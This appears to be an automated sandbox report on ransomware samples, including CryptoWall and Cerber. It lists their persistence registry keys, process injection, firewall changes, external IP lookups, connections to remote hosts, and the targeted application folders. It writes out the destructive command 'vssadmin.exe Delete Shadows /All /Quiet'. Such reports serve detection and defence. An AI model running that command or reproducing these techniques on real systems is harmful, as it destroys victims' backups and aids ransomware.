Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240903-en

Max time kernel

131s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9bf0c776.exe C:\Windows\syswow64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\9bf0c77 = "C:\\9bf0c776\\9bf0c776.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*bf0c77 = "C:\\9bf0c776\\9bf0c776.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\9bf0c776 = "C:\\Users\\Admin\\AppData\\Roaming\\9bf0c776.exe" C:\Windows\syswow64\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*bf0c776 = "C:\\Users\\Admin\\AppData\\Roaming\\9bf0c776.exe" C:\Windows\syswow64\explorer.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-addr.es N/A N/A
N/A myexternalip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2088 set thread context of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\svchost.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
N/A N/A C:\Windows\syswow64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2088 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
PID 2500 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2500 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2500 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2500 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe C:\Windows\syswow64\explorer.exe
PID 2924 wrote to memory of 2556 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2924 wrote to memory of 2556 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2924 wrote to memory of 2556 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2924 wrote to memory of 2556 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\svchost.exe
PID 2924 wrote to memory of 1952 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2924 wrote to memory of 1952 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2924 wrote to memory of 1952 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe
PID 2924 wrote to memory of 1952 N/A C:\Windows\syswow64\explorer.exe C:\Windows\syswow64\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Windows\syswow64\explorer.exe

"C:\Windows\syswow64\explorer.exe"

C:\Windows\syswow64\svchost.exe

-k netsvcs

C:\Windows\syswow64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-addr.es udp
FR 188.165.164.184:80 ip-addr.es tcp
US 8.8.8.8:53 myexternalip.com udp
US 34.160.111.145:80 myexternalip.com tcp
FR 94.247.28.26:2525 tcp
FR 91.121.12.127:4141 tcp
FR 94.247.28.156:8081 tcp
US 209.148.85.151:8080 tcp
FR 94.247.31.19:8080 tcp
FR 188.165.164.184:80 ip-addr.es tcp
US 34.160.111.145:80 myexternalip.com tcp
FR 94.247.28.26:2525 tcp
FR 91.121.12.127:4141 tcp

Files

memory/2500-13-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2500-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2500-14-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2500-9-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2500-7-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2500-5-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2500-3-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2500-1-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2088-0-0x0000000000230000-0x0000000000246000-memory.dmp

memory/2500-18-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2924-15-0x00000000000C0000-0x00000000000E5000-memory.dmp

memory/2556-22-0x00000000000C0000-0x00000000000E5000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

139s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240903-en

Max time kernel

119s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

Signatures

Cerber

ransomware cerber

Cerber family

cerber

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Contacts a large (1097) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpB931.bmp" C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
